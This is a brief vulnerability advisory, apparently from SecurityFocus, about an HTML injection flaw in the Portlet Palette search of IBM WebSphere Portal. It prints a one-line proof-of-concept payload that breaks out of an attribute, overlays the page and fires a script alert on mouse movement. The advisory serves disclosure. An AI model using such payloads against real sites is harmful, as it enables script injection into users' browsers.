IBM WebSphere Portal Portlet Palette Search HTML Injection Vulnerability

Attackers can exploit this issue with a browser.

The following code can trigger this issue:

" style="position:absolute; top:-100px; left:-100px; width:10000 px; height:10000px; z-index:999;" onmousemove="alert('XSS')">


 

Privacy Statement
Copyright 2010, SecurityFocus